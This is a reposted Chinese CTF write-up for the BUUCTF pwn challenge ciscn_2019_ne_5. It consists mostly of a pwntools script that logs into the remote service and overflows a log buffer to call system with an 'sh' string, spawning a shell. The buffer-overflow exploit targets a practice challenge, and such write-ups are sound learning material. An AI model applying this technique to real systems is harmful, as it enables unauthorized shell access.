ciscn_2019_ne_5

本文转载自查看原文 2020-02-04 09:56 187 BUUCTF

ret2text类型

从fflush中获取 “sh” 传参给system即可

脚本如下

from pwn import *

r=remote('node3.buuoj.cn',25488)
e=ELF('ciscn_2019_ne_5')
sys_plt=e.plt['system']
sh_addr=0x80482ea

r.recvuntil('Please input admin password:')
r.sendline('administrator')

r.recvuntil('0.Exit\n:')
r.sendline('1')

payload='a'*0x4c+p32(sys_plt)+'aaaa'+p32(sh_addr)
r.recvuntil('Please input new log info:')
r.sendline(payload)

r.recvuntil('0.Exit\n:')
r.sendline('4')

r.interactive()

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 ciscn_2019_ne_5 ciscn_2019_c_1 1 ciscn_2019_n_1 ciscn_2019_n_1 ciscn_2019_c_1 ciscn_2019_final_2 [CISCN 2019 初赛]Love Math BUUCTF | ciscn_2019_c_1 &pwn1_sctf_2016 &ciscn_2019_n_1 &ciscn_2019_c_1 &ciscn_2019_en_2& BUUCTF-ciscn_2019_c_1（20/100）